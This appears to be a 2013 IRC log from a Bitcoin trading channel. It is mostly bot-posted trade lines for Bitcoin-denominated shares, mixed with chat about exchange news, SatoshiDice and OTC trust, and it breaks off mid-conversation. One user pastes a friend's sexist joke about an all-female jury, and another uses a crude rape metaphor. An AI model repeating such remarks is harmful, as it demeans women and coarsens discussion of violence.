[DMS.SELLING] 34 @ 0.025741 = 0.8752 BTC [-] Jul 13 15:45:43 [BTCTC] [DMS.SELLING] 11 @ 0.025499 = 0.2805 BTC [-] Jul 13 15:45:44 [BTCTC] [COGNITIVE] 2 @ 0.462 = 0.924 BTC [-] Jul 13 15:46:01 [BTCTC] [BASIC-MINING] 1 @ 0.770001 BTC [+] Jul 13 15:46:03 [BTCTC] [BASIC-MINING] 1 @ 0.760001 BTC [-] Jul 13 15:46:20 [BTCTC] [BASIC-MINING] 1 @ 0.760001 BTC [-] Jul 13 15:46:37 [BTCTC] [BASIC-MINING] 1 @ 0.7561 BTC [-] Jul 13 15:46:50 [BTCTC] [BASIC-MINING] 2 @ 0.75 = 1.5 BTC [-] Jul 13 15:47:41 [BTCTC] [COGNITIVE] 1 @ 0.440003 BTC [-] Jul 13 15:50:00 [BTCTC] [B.YABMC] 3 @ 0.0025 = 0.0075 BTC [+] Jul 13 15:54:57 [BTCTC] [AMC-PT] 100 @ 0.002492 = 0.2492 BTC [-] Jul 13 15:56:01 [BTCTC] [DMS.PURCHASE] 2 @ 0.04 = 0.08 BTC [-] Jul 13 15:56:08 [BTCTC] [DMS.PURCHASE] 298 @ 0.040366 = 12.0291 BTC [+] Jul 13 15:57:36 [BTCTC] [ASICMINER-PT] 1 @ 4.29 BTC [-] Jul 13 15:58:17 [BTCTC] [DMS.MINING] 9 @ 0.015001 = 0.135 BTC [+] Jul 13 15:58:35 [BTCTC] [BITVPS] 250 @ 0.002036 = 0.509 BTC [-] Jul 13 15:59:10 [BTCTC] [BITVPS] 158 @ 0.002035 = 0.3215 BTC [-] Jul 13 15:59:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.042419 BTC [-] Jul 13 16:00:16 [BTCTC] [BASIC-MINING] 1 @ 0.7495 BTC [-] Jul 13 16:01:38 [BTCTC] [BASIC-MINING] 1 @ 0.731 BTC [-] Jul 13 16:12:26 [BTCTC] [DMS.PURCHASE] 88 @ 0.040366 = 3.5522 BTC [+] Jul 13 16:14:58 [BTCTC] [DMS.SELLING] 19 @ 0.027239 = 0.5175 BTC [+] Jul 13 16:17:44 [MPEX] [S.MPOE] 10100 @ 0.0008247 = 8.3295 BTC [-] Jul 13 16:18:01 [BTCTC] [DMS.MINING] 1 @ 0.015001 BTC [+] Jul 13 16:18:10 [BTCTC] [DMS.MINING] 4 @ 0.015 = 0.06 BTC [-] Jul 13 16:19:44 [BTCTC] [TAT.ASICMINER] 7 @ 0.042415 = 0.2969 BTC [-] Jul 13 16:22:49 [BTCTC] [BITVPS] 250 @ 0.002036 = 0.509 BTC [+] Jul 13 16:22:50 [BTCTC] [BITVPS] 342 @ 0.002035 = 0.696 BTC [-] Jul 13 16:22:52 [BTCTC] [BITVPS] 500 @ 0.002015 = 1.0075 BTC [-] Jul 13 16:22:53 [BTCTC] [BITVPS] 500 @ 0.002 = 1 BTC [-] Jul 13 16:23:49 [BTCTC] [AMC-PT] 750 @ 0.0025 = 1.875 BTC [+] Jul 13 16:30:00 [BTCTC] [DMS.MINING] 96 @ 0.015 = 1.44 BTC [-] Jul 13 16:30:02 [BTCTC] [DMS.MINING] 100 @ 0.015 = 1.5 BTC [-] Jul 13 16:31:30 [BTCTC] [DMS.PURCHASE] 200 @ 0.040366 = 8.0732 BTC [+] Jul 13 16:33:57 [BTCTC] [DMS.PURCHASE] 100 @ 0.040366 = 4.0366 BTC [+] Jul 13 16:40:32 [BTCTC] [ASICMINER-PT] 1 @ 4.29966 BTC [+] Jul 13 16:42:09 [BTCTC] [ASICMINER-PT] 1 @ 4.2997 BTC [+] Jul 13 16:44:17 [HAVELOCK] [AM100] 1 @ 0.04001 BTC [+] Jul 13 16:44:40 [BTCTC] [DMS.SELLING] 6 @ 0.026499 = 0.159 BTC [-] Jul 13 16:47:34 [BTCTC] [ASICMINER-PT] 1 @ 4.2998 BTC [+] Jul 13 16:47:43 [HAVELOCK] [AM100] 1 @ 0.04 BTC [-] Jul 13 16:48:48 [BTCTC] [BASIC-MINING] 1 @ 0.789499 BTC [+] Jul 13 16:49:53 [HAVELOCK] [SDSTM] 5 @ 0.00889 = 0.0445 BTC [-] Jul 13 16:50:27 [BTCTC] [AMC-PT] 537 @ 0.0025 = 1.3425 BTC [+] Jul 13 16:50:45 [BTCTC] [DMS.MINING] 1 @ 0.01491 BTC [-] Jul 13 16:50:45 [BTCTC] [AMC-PT] 300 @ 0.0025 = 0.75 BTC [+] Jul 13 16:50:47 [BTCTC] [DMS.MINING] 99 @ 0.0149 = 1.4751 BTC [-] Jul 13 16:50:51 [BTCTC] [DMS.MINING] 10 @ 0.0149 = 0.149 BTC [-] Jul 13 16:55:04 [HAVELOCK] [HIM] 3 @ 0.268 = 0.804 BTC [+] Jul 13 16:56:05 http://www.forbes.com/sites/jonmatonis/2013/06/25/exante-adds-share-trading-to-global-bitcoin-fund/ Jul 13 16:56:10 Exante Adds Share Trading To Global Bitcoin Fund - Forbes Jul 13 16:57:54 he's been pushing that since day one Jul 13 16:57:58 nobody else seems to care Jul 13 16:58:02 wonder what the angle is. Jul 13 16:58:55 [BTCTC] [BASIC-MINING] 5 @ 0.73093 = 3.6547 BTC [-] Jul 13 16:58:56 [BTCTC] [BASIC-MINING] 1 @ 0.73092 BTC [-] Jul 13 16:58:58 [BTCTC] [BASIC-MINING] 10 @ 0.730001 = 7.3 BTC [-] Jul 13 16:59:00 [BTCTC] [BASIC-MINING] 3 @ 0.73 = 2.19 BTC [-] Jul 13 16:59:01 [BTCTC] [BASIC-MINING] 5 @ 0.73 = 3.65 BTC [-] Jul 13 16:59:02 [BTCTC] [BASIC-MINING] 1 @ 0.72 BTC [-] Jul 13 16:59:04 [BTCTC] [BASIC-MINING] 1 @ 0.711998 BTC [-] Jul 13 16:59:05 [BTCTC] [BASIC-MINING] 2 @ 0.705 = 1.41 BTC [-] Jul 13 16:59:07 [BTCTC] [BASIC-MINING] 10 @ 0.701001 = 7.01 BTC [-] Jul 13 16:59:08 [BTCTC] [BASIC-MINING] 5 @ 0.701 = 3.505 BTC [-] Jul 13 16:59:16 [HAVELOCK] [VTX] 5 @ 0.83001 = 4.1501 BTC [-] Jul 13 16:59:47 [HAVELOCK] [VTX] 1 @ 0.83 BTC [-] Jul 13 16:59:58 [HAVELOCK] [VTX] 1 @ 0.8201 BTC [-] Jul 13 17:00:10 [HAVELOCK] [VTX] 8 @ 0.82 = 6.56 BTC [-] Jul 13 17:00:13 [BTCTC] [BASIC-MINING] 3 @ 0.7001 = 2.1003 BTC [-] Jul 13 17:00:29 [HAVELOCK] [VTX] 3 @ 0.81 = 2.43 BTC [-] Jul 13 17:01:07 [HAVELOCK] [AM100] 1 @ 0.03995 BTC [-] Jul 13 17:01:31 [HAVELOCK] [AM100] 9 @ 0.03995 = 0.3596 BTC [-] Jul 13 17:03:43 [BTCTC] [TAT.ASICMINER] 6 @ 0.042405 = 0.2544 BTC [-] Jul 13 17:05:27 [BTCTC] [DMS.PURCHASE] 4 @ 0.040366 = 0.1615 BTC [+] Jul 13 17:11:27 [HAVELOCK] [AM100] 1 @ 0.03965 BTC [-] Jul 13 17:12:18 [BTCTC] [ASICMINER-PT] 2 @ 4.29999 = 8.6 BTC [+] Jul 13 17:13:26 [BTCTC] [TAT.ASICMINER] 65 @ 0.042015 = 2.731 BTC [-] Jul 13 17:13:47 [BTCTC] [COGNITIVE] 1 @ 0.440003 BTC [-] Jul 13 17:15:48 ;;ticker Jul 13 17:15:49 MtGox BTCUSD ticker | Best bid: 92.89666, Best ask: 93.43403, Bid-ask spread: 0.53737, Last trade: 93.43000, 24 hour volume: 49413.59478313, 24 hour low: 87.76404, 24 hour high: 100.72800, 24 hour vwap: 93.11422 Jul 13 17:15:57 probably because it's a bridge to "real world" finance Jul 13 17:18:43 http://motherboard.vice.com/blog/one-third-of-kenyans-now-have-a-bitcoin-wallet Jul 13 17:18:45 One Third of Kenyans Now Have a Bitcoin Wallet | Motherboard Jul 13 17:19:55 tat: that's approximately 10 btc Jul 13 17:20:04 hehe Jul 13 17:20:24 http://www.prweb.com/releases/2013/7/prweb10922866.htmhttp://www.prweb.com/releases/2013/7/prweb10922866.htm Jul 13 17:20:43 New Market Opens for Bitcoin Holders as Purchases of Palladium with Bitcoin are Now Available Jul 13 17:22:37 (unrelated) reddit excerpt: Jul 13 17:22:45 "Actually, if you make commodities trades more than 10 times within 90 days without it being linked to an IRA with more than $15K in assets, you qualify as a rogue "day-trader" and you can be fined heavily." Jul 13 17:22:52 "Where are you getting that from? I've never seen that mentioned anywhere in BTC-related topics before." Jul 13 17:22:57 "I study quantitative financial analysis." Jul 13 17:23:03 "I study farts." Jul 13 17:24:04 http://thegenesisblock.com/mt-gox-withdrawal-freeze-driving-significant-liquidity-concerns/ Jul 13 17:24:07 Mt. Gox Withdrawal Freeze Driving Significant Liquidity Concerns - The Genesis Block Jul 13 17:24:10 2 weeks, no, 2 weeks Jul 13 17:24:47 [MPEX] [S.MPOE] 5159 @ 0.0008278 = 4.2706 BTC [+] Jul 13 17:26:13 http://gigaom.com/2013/07/12/coinbase-offers-new-id-checks-for-heavy-impatient-bitcoin-users-but-why/ Jul 13 17:26:15 Coinbase offers new ID checks for heavy, impatient Bitcoin users — but why? — Tech News and Jul 13 17:26:19 "Ehrsam admitted that the limits for both level 1 and 2 users were quite “finger in the air” at the moment. That remains a pretty good assessment for the Bitcoin scene in general, I suspect." Jul 13 17:29:04 [BTCTC] [ASICMINER-PT] 2 @ 4.29999 = 8.6 BTC [+] Jul 13 17:29:56 [BTCTC] [DMS.MINING] 21 @ 0.014999 = 0.315 BTC [+] Jul 13 17:29:56 [BTCTC] [DMS.MINING] 200 @ 0.015 = 3 BTC [+] Jul 13 17:30:23 [HAVELOCK] [AM100] 1 @ 0.0404 BTC [+] Jul 13 17:30:33 teh noobs doth suspect too much. Jul 13 17:30:37 [BTCTC] [ASICMINER-PT] 1 @ 4.28 BTC [-] Jul 13 17:33:31 [BTCTC] [BITVPS] 250 @ 0.002016 = 0.504 BTC [+] Jul 13 17:34:23 A friend on the Treyvon Martin case: "How's this trial a black/white thing? Dude look like A.Hernandez's cousin to me. No matter what the verdict I hope everybody can be united against the real travesty here, an all female jury!! I think having a bunch of chicks judge u is punishment enuff for most crimes, and No matter what they gettin it wrong. Plus it will prob take forever. I've Jul 13 17:34:23 never seen 2 females be able agree on what appetizers to get at Applebee's in less than an hour and a half." Jul 13 17:35:41 amurrka can you get your shit together? Jul 13 17:36:00 this treyvon martin thing makes me laugh Jul 13 17:36:17 seriously, they are even posting about it on slashdot and HN Jul 13 17:36:22 WHO GIVES A SHIT Jul 13 17:36:34 you apparently Jul 13 17:36:37 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 13 17:37:07 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 13 17:38:52 [BTCTC] [ASICMINER-PT] 1 @ 4.281 BTC [+] Jul 13 17:39:09 heheh... sorry, i'm in a jovially dickish mood this morning Jul 13 17:39:25 [BTCTC] [B.YABMC] 1 @ 0.0025 BTC [+] Jul 13 17:40:01 [BTCTC] [ASICMINER-PT] 2 @ 4.28 = 8.56 BTC [-] Jul 13 17:41:17 [BTCTC] [ASICMINER-PT] 1 @ 4.28 BTC [-] Jul 13 17:42:32 [HAVELOCK] [AM100] 2 @ 0.04 = 0.08 BTC [-] Jul 13 17:43:20 [BTCTC] [DMS.PURCHASE] 7 @ 0.040366 = 0.2826 BTC [+] Jul 13 17:44:33 [BTCTC] [COGNITIVE] 1 @ 0.499999 BTC [+] Jul 13 17:44:50 [BTCTC] [COGNITIVE] 2 @ 0.5 = 1 BTC [+] Jul 13 17:45:02 [BTCTC] [ASICMINER-PT] 1 @ 4.28001 BTC [+] Jul 13 17:45:16 just dice is holding 28,500btc Jul 13 17:45:20 amze Jul 13 17:45:27 amaze* Jul 13 17:46:13 [HAVELOCK] [AM100] 1 @ 0.04 BTC [-] Jul 13 17:47:48 [BTCTC] [TAT.ASICMINER] 118 @ 0.042012 = 4.9574 BTC [-] Jul 13 17:47:50 [BTCTC] [TAT.ASICMINER] 47 @ 0.042011 = 1.9745 BTC [-] Jul 13 17:47:52 [BTCTC] [TAT.ASICMINER] 41 @ 0.04201 = 1.7224 BTC [-] Jul 13 17:47:54 [BTCTC] [TAT.ASICMINER] 100 @ 0.042 = 4.2 BTC [-] Jul 13 17:47:56 [BTCTC] [TAT.ASICMINER] 49 @ 0.042 = 2.058 BTC [-] Jul 13 17:47:58 [BTCTC] [TAT.ASICMINER] 100 @ 0.04181 = 4.181 BTC [-] Jul 13 17:47:59 [BTCTC] [TAT.ASICMINER] 100 @ 0.0418 = 4.18 BTC [-] Jul 13 17:48:01 [BTCTC] [TAT.ASICMINER] 90 @ 0.041703 = 3.7533 BTC [-] Jul 13 17:48:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.0417 = 0.0834 BTC [-] Jul 13 17:48:08 [BTCTC] [TAT.ASICMINER] 100 @ 0.0417 = 4.17 BTC [-] Jul 13 17:48:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.0416 = 0.0832 BTC [-] Jul 13 17:48:13 [BTCTC] [TAT.ASICMINER] 20 @ 0.04151 = 0.8302 BTC [-] Jul 13 17:48:15 [BTCTC] [TAT.ASICMINER] 41 @ 0.04151 = 1.7019 BTC [-] Jul 13 17:52:29 [BTCTC] [ASICMINER-PT] 1 @ 4.28002 BTC [+] Jul 13 17:53:34 why is that amazing ? Jul 13 17:53:46 there's at least 50 scams that got more Jul 13 17:53:54 why shouldn't an actual busienss manage it ? Jul 13 17:54:55 those are amazing too Jul 13 17:55:05 but I am also amazed at the speed Jul 13 17:55:57 hmm.. and no-one wants to sell S.MPOE anymore Jul 13 17:56:09 nor S.MG Jul 13 17:56:27 S.MG at least has sell orders Jul 13 17:56:51 FabianB_ bitcoin shares work like irl banks : if nobody's buying everyone wants to sell Jul 13 17:56:58 if someione's buying nobody wants to sell suddenly. Jul 13 17:58:18 that's why S.BBET's orderbook looks like the opposite of S.MG Jul 13 17:58:50 yeah lol Jul 13 18:00:18 [HAVELOCK] [SDSTM] 1 @ 0.00889 BTC [-] Jul 13 18:02:03 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Jul 13 18:06:37 http://www.npr.org/blogs/thetwo-way/2013/07/12/201399605/snowden-to-meet-with-activists-issue-new-statement?utm_source=npr&utm_medium=facebook&utm_campaign=20130712 Jul 13 18:07:02 [BTCTC] [ASICMINER-PT] 3 @ 4.28 = 12.84 BTC [-] Jul 13 18:07:06 Snowden Hopes For Temporary Asylum In Russia : The Two-Way : NPR Jul 13 18:07:08 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 13 18:07:37 [BTCTC] [DMS.PURCHASE] 1000 @ 0.040366 = 40.366 BTC [+] Jul 13 18:08:35 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0041 = 0.0082 BTC [-] Jul 13 18:08:39 ;;estimate Jul 13 18:08:40 Next difficulty estimate | 29142675.2163 based on data since last change | 29082213.0419 based on data for last three days Jul 13 18:08:47 ;;bcstats Jul 13 18:08:49 Current Blocks: 246370 | Current Difficulty: 2.61628756825699E7 | Next Difficulty At Block: 247967 | Next Difficulty In: 1597 blocks | Next Difficulty In About: 1 week, 3 days, 15 hours, 31 minutes, and 12 seconds | Next Difficulty Estimate: 29142675.2163 | Estimated Percent Change: 11.38942 Jul 13 18:09:45 [MPEX] [S.MPOE] 8574 @ 0.00083305 = 7.1426 BTC [+] Jul 13 18:09:53 [BTCTC] [BASIC-MINING] 2 @ 0.715 = 1.43 BTC [+] Jul 13 18:09:55 [BTCTC] [BASIC-MINING] 16 @ 0.71 = 11.36 BTC [-] Jul 13 18:13:58 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 13 18:14:46 [HAVELOCK] [HIM] 5 @ 0.2690001 = 1.345 BTC [+] Jul 13 18:16:30 is the us being raped by its own secret services more embarassing than the russians being raped by the cecens by now ? Jul 13 18:17:56 more media coverage in a shorter time period i guess Jul 13 18:18:48 [BTCTC] [BASIC-MINING] 2 @ 0.71 = 1.42 BTC [-] Jul 13 18:20:20 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [+] Jul 13 18:24:16 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Jul 13 18:26:15 [BTCTC] [TAT.ASICMINER] 30 @ 0.042388 = 1.2716 BTC [+] Jul 13 18:29:11 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 13 18:30:38 [BTCTC] [COGNITIVE] 1 @ 0.518999 BTC [+] Jul 13 18:41:21 [BTCTC] [TAT.ASICMINER] 69 @ 0.0416 = 2.8704 BTC [-] Jul 13 18:41:25 [HAVELOCK] [SDSTM] 4 @ 0.00889 = 0.0356 BTC [-] Jul 13 18:45:33 [HAVELOCK] [AM100] 1 @ 0.0402 BTC [+] Jul 13 18:46:24 [HAVELOCK] [AM100] 1 @ 0.0402 BTC [+] Jul 13 18:46:45 [HAVELOCK] [AM100] 3 @ 0.0402 = 0.1206 BTC [+] Jul 13 18:48:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.0415 = 0.083 BTC [-] Jul 13 18:48:41 [BTCTC] [TAT.ASICMINER] 31 @ 0.0415 = 1.2865 BTC [-] Jul 13 18:48:51 [BTCTC] [TAT.ASICMINER] 10 @ 0.0415 = 0.415 BTC [-] Jul 13 18:49:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.04132 BTC [-] Jul 13 18:49:38 [BTCTC] [TAT.ASICMINER] 4 @ 0.041301 = 0.1652 BTC [-] Jul 13 18:49:56 [BTCTC] [TAT.ASICMINER] 20 @ 0.04122 = 0.8244 BTC [-] Jul 13 18:50:18 [BTCTC] [BASIC-MINING] 4 @ 0.789499 = 3.158 BTC [+] Jul 13 18:50:27 [BTCTC] [TAT.ASICMINER] 8 @ 0.0412 = 0.3296 BTC [-] Jul 13 18:51:05 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Jul 13 18:53:01 [HAVELOCK] [SDICE] 6 @ 0.2 = 1.2 BTC [-] Jul 13 18:53:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.0412 BTC [-] Jul 13 18:53:46 [BTCTC] [AMC-PT] 29 @ 0.0025 = 0.0725 BTC [+] Jul 13 18:54:02 [HAVELOCK] [SDICE] 40 @ 0.2 = 8 BTC [-] Jul 13 18:56:18 [BTCTC] [BASIC-MINING] 4 @ 0.789499 = 3.158 BTC [+] Jul 13 18:57:49 [BTCTC] [COGNITIVE] 1 @ 0.518999 BTC [+] Jul 13 18:57:51 [BTCTC] [COGNITIVE] 1 @ 0.519 BTC [+] Jul 13 18:57:52 [BTCTC] [COGNITIVE] 5 @ 0.5499 = 2.7495 BTC [+] Jul 13 18:57:54 [BTCTC] [COGNITIVE] 9 @ 0.55 = 4.95 BTC [+] Jul 13 18:57:55 [BTCTC] [COGNITIVE] 1 @ 0.55 BTC [+] Jul 13 19:04:54 [BTCTC] [AMC-PT] 399 @ 0.0025 = 0.9975 BTC [+] Jul 13 19:11:13 [BTCTC] [B.YABMC] 1 @ 0.0025 BTC [+] Jul 13 19:12:38 [BTCTC] [AMC-PT] 11 @ 0.0025 = 0.0275 BTC [+] Jul 13 19:14:30 [BTCTC] [COGNITIVE] 1 @ 0.559995 BTC [+] Jul 13 19:14:31 [BTCTC] [COGNITIVE] 3 @ 0.56 = 1.68 BTC [+] Jul 13 19:14:32 [BTCTC] [COGNITIVE] 2 @ 0.56 = 1.12 BTC [+] Jul 13 19:14:33 [BTCTC] [COGNITIVE] 2 @ 0.565 = 1.13 BTC [+] Jul 13 19:14:35 [BTCTC] [COGNITIVE] 3 @ 0.57 = 1.71 BTC [+] Jul 13 19:15:25 [BTCTC] [DMS.SELLING] 7 @ 0.026499 = 0.1855 BTC [-] Jul 13 19:16:17 [HAVELOCK] [VTX] 5 @ 0.76 = 3.8 BTC [-] Jul 13 19:16:28 [HAVELOCK] [VTX] 5 @ 0.71 = 3.55 BTC [-] Jul 13 19:16:41 [HAVELOCK] [VTX] 5 @ 0.67 = 3.35 BTC [-] Jul 13 19:16:56 [HAVELOCK] [VTX] 5 @ 0.6664 = 3.332 BTC [-] Jul 13 19:17:10 [HAVELOCK] [VTX] 6 @ 0.66611001 = 3.9967 BTC [-] Jul 13 19:17:20 [HAVELOCK] [VTX] 5 @ 0.6661 = 3.3305 BTC [-] Jul 13 19:17:36 [HAVELOCK] [VTX] 25 @ 0.666 = 16.65 BTC [-] Jul 13 19:17:48 [HAVELOCK] [VTX] 45 @ 0.6651 = 29.9295 BTC [-] Jul 13 19:18:02 [HAVELOCK] [VTX] 7 @ 0.5695 = 3.9865 BTC [-] Jul 13 19:18:18 [HAVELOCK] [VTX] 25 @ 0.51 = 12.75 BTC [-] Jul 13 19:18:29 [HAVELOCK] [VTX] 19 @ 0.5 = 9.5 BTC [-] Jul 13 19:23:13 [BTCTC] [COGNITIVE] 1 @ 0.559994 BTC [-] Jul 13 19:25:51 morning everyone :) Jul 13 19:26:44 [HAVELOCK] [SDSTM] 19 @ 0.00969 = 0.1841 BTC [+] Jul 13 19:26:45 [HAVELOCK] [SDSTM] 101 @ 0.0097 = 0.9797 BTC [+] Jul 13 19:33:24 [HAVELOCK] [SDICE] 5 @ 0.20499 = 1.025 BTC [+] Jul 13 19:34:25 [BTCTC] [DMS.PURCHASE] 5 @ 0.04035 = 0.2018 BTC [-] Jul 13 19:34:36 [BTCTC] [COGNITIVE] 6 @ 0.57 = 3.42 BTC [+] Jul 13 19:35:08 [HAVELOCK] [SDICE] 4 @ 0.20499 = 0.82 BTC [+] Jul 13 19:35:42 [HAVELOCK] [SDSTM] 1 @ 0.0097 BTC [+] Jul 13 19:37:15 [BTCTC] [TAT.ASICMINER] 23 @ 0.042295 = 0.9728 BTC [+] Jul 13 19:37:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.042 = 0.084 BTC [-] Jul 13 19:38:50 [BTCTC] [AMC-PT] 100 @ 0.002495 = 0.2495 BTC [-] Jul 13 19:40:46 [BTCTC] [AMC-PT] 100 @ 0.002494 = 0.2494 BTC [-] Jul 13 19:40:48 [BTCTC] [AMC-PT] 51 @ 0.002493 = 0.1271 BTC [-] Jul 13 19:41:06 [BTCTC] [GSDPT] 1 @ 0.002072 BTC [-] Jul 13 19:41:42 [BTCTC] [GSDPT] 1 @ 0.002072 BTC [-] Jul 13 19:43:12 [BTCTC] [TAT.ASICMINER] 32 @ 0.041987 = 1.3436 BTC [-] Jul 13 19:44:21 [BTCTC] [TAT.ASICMINER] 12 @ 0.041988 = 0.5039 BTC [+] Jul 13 19:56:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00411 BTC [+] Jul 13 19:58:31 [BTCTC] [DMS.MINING] 1 @ 0.0151 BTC [+] Jul 13 19:58:33 [BTCTC] [DMS.MINING] 200 @ 0.015 = 3 BTC [-] Jul 13 19:59:17 JD investors are feeling their first loss, this should be fun Jul 13 20:00:39 yep Jul 13 20:00:49 this nakowa guy was betting like crazy.. Jul 13 20:01:25 [BTCTC] [AMC-PT] 2 @ 0.002493 = 0.005 BTC [-] Jul 13 20:04:17 ThickAsThieves: do you know how much SDICE has on hand? Jul 13 20:05:25 [BTCTC] [ASICMINER-PT] 1 @ 4.29 BTC [-] Jul 13 20:06:09 [BTCTC] [BASIC-MINING] 10 @ 0.7501 = 7.501 BTC [-] Jul 13 20:06:57 [BTCTC] [BASIC-MINING] 2 @ 0.750099 = 1.5002 BTC [-] Jul 13 20:06:59 [BTCTC] [BASIC-MINING] 1 @ 0.72 BTC [-] Jul 13 20:07:00 [BTCTC] [BASIC-MINING] 2 @ 0.7001 = 1.4002 BTC [-] Jul 13 20:07:25 [BTCTC] [ASICMINER-PT] 1 @ 4.281 BTC [-] Jul 13 20:07:27 [BTCTC] [ASICMINER-PT] 4 @ 4.28 = 17.12 BTC [-] Jul 13 20:08:14 [BTCTC] [ASICMINER-PT] 1 @ 4.273 BTC [-] Jul 13 20:08:37 [BTCTC] [ASICMINER-PT] 4 @ 4.29 = 17.16 BTC [+] Jul 13 20:09:29 I do not Jul 13 20:09:42 ive been told like 60k or something Jul 13 20:09:46 but i have no idea Jul 13 20:10:22 but not as betting pool Jul 13 20:12:30 [BTCTC] [TAT.ASICMINER] 46 @ 0.041979 = 1.931 BTC [-] Jul 13 20:14:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.04198 = 0.4198 BTC [+] Jul 13 20:14:32 [BTCTC] [BTC-BOND] 12 @ 0.009996 = 0.12 BTC [+] Jul 13 20:14:51 [HAVELOCK] [SDSTM] 30 @ 0.00889 = 0.2667 BTC [-] Jul 13 20:15:29 [HAVELOCK] [SDSTM] 2 @ 0.0097 = 0.0194 BTC [+] Jul 13 20:16:13 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00422 BTC [+] Jul 13 20:17:11 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 13 20:19:06 [HAVELOCK] [SDSTM] 20 @ 0.0097 = 0.194 BTC [+] Jul 13 20:21:32 ThickAsThieves: you should start your own game company Jul 13 20:22:40 to do what? Jul 13 20:23:44 lol Jul 13 20:23:52 you think MP is not qualified, yet I am? Jul 13 20:26:45 [BTCTC] [AMC-PT] 225 @ 0.0025 = 0.5625 BTC [+] Jul 13 20:28:22 damn, how does one build an otc reputation these days when people are afraid to trade for $20... Jul 13 20:29:25 hey man, i could get a gram of weed for 20 bucks Jul 13 20:29:32 [BTCTC] [S.DICE-PT] 51 @ 0.002251 = 0.1148 BTC [-] Jul 13 20:29:34 [BTCTC] [S.DICE-PT] 151 @ 0.002205 = 0.333 BTC [-] Jul 13 20:29:35 [BTCTC] [S.DICE-PT] 119 @ 0.002175 = 0.2588 BTC [-] Jul 13 20:29:37 [BTCTC] [S.DICE-PT] 150 @ 0.002155 = 0.3233 BTC [-] Jul 13 20:29:37 [BTCTC] [S.DICE-PT] 150 @ 0.002105 = 0.3158 BTC [-] Jul 13 20:29:43 [HAVELOCK] [SDSTM] 7 @ 0.0097 = 0.0679 BTC [+] Jul 13 20:29:51 cosmo, i'm looking for btc actually Jul 13 20:29:52 [BTCTC] [S.DICE-PT] 75 @ 0.002101 = 0.1576 BTC [-] Jul 13 20:29:54 [BTCTC] [S.DICE-PT] 8700 @ 0.0021 = 18.27 BTC [-] Jul 13 20:29:56 [BTCTC] [S.DICE-PT] 9 @ 0.002053 = 0.0185 BTC [-] Jul 13 20:29:57 [BTCTC] [S.DICE-PT] 100 @ 0.002053 = 0.2053 BTC [-] Jul 13 20:29:59 [BTCTC] [S.DICE-PT] 100 @ 0.002053 = 0.2053 BTC [-] Jul 13 20:30:00 [BTCTC] [S.DICE-PT] 200 @ 0.002051 = 0.4102 BTC [-] Jul 13 20:30:02 [BTCTC] [S.DICE-PT] 200 @ 0.002045 = 0.409 BTC [-] Jul 13 20:30:03 [BTCTC] [S.DICE-PT] 212 @ 0.002042 = 0.4329 BTC [-] Jul 13 20:30:19 [BTCTC] [S.DICE-PT] 200 @ 0.002041 = 0.4082 BTC [-] Jul 13 20:30:19 [BTCTC] [S.DICE-PT] 11 @ 0.00204 = 0.0224 BTC [-] Jul 13 20:30:20 [BTCTC] [S.DICE-PT] 100 @ 0.00204 = 0.204 BTC [-] Jul 13 20:30:21 [BTCTC] [S.DICE-PT] 90 @ 0.00202 = 0.1818 BTC [-] Jul 13 20:30:23 [BTCTC] [S.DICE-PT] 300 @ 0.002 = 0.6 BTC [-] Jul 13 20:30:24 [BTCTC] [S.DICE-PT] 1000 @ 0.002 = 2 BTC [-] Jul 13 20:30:26 [BTCTC] [S.DICE-PT] 1000 @ 0.002 = 2 BTC [-] Jul 13 20:30:27 [BTCTC] [S.DICE-PT] 10000 @ 0.002 = 20 BTC [-] Jul 13 20:30:28 nvm Jul 13 20:30:41 [HAVELOCK] [AM100] 1 @ 0.0405 BTC [+] Jul 13 20:30:43 [HAVELOCK] [AM100] 20 @ 0.0405 = 0.81 BTC [+] Jul 13 20:34:34 [BTCTC] [DMS.SELLING] 18 @ 0.02575 = 0.4635 BTC [-] Jul 13 20:34:36 [BTCTC] [DMS.SELLING] 6 @ 0.025741 = 0.1544 BTC [-] Jul 13 20:35:24 [BTCTC] [DMS.MINING] 20 @ 0.015 = 0.3 BTC [-] Jul 13 20:36:42 [BTCTC] [DMS.MINING] 5 @ 0.015 = 0.075 BTC [-] Jul 13 20:36:44 [BTCTC] [DMS.MINING] 1 @ 0.015 BTC [-] Jul 13 20:37:16 [BTCTC] [DMS.SELLING] 6 @ 0.025741 = 0.1544 BTC [-] Jul 13 20:37:54 [BTCTC] [DMS.SELLING] 7 @ 0.025741 = 0.1802 BTC [-] Jul 13 20:42:26 [BTCTC] [DMS.PURCHASE] 33 @ 0.04035 = 1.3316 BTC [-] Jul 13 20:55:08 [BTCTC] [S.DICE-PT] 200 @ 0.001998 = 0.3996 BTC [-] Jul 13 20:55:11 [BTCTC] [S.DICE-PT] 100 @ 0.001997 = 0.1997 BTC [-] Jul 13 20:56:23 Apocalyptic its probably pretty hard by now Jul 13 20:56:50 yeah i figured, been trying to buy some for 2 hours now Jul 13 20:57:38 i guess a scammer history leaves trust wounds Jul 13 20:59:37 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00422 = 0.0169 BTC [+] Jul 13 21:00:43 Apocalyptic: why not just go the dwolla route? Jul 13 21:01:02 I linked Dwolla to CampBX and I can pretty much buy BTC instantly if my dwolla is loaded up Jul 13 21:01:09 but then again I'm in US Jul 13 21:01:15 i'm from EU Jul 13 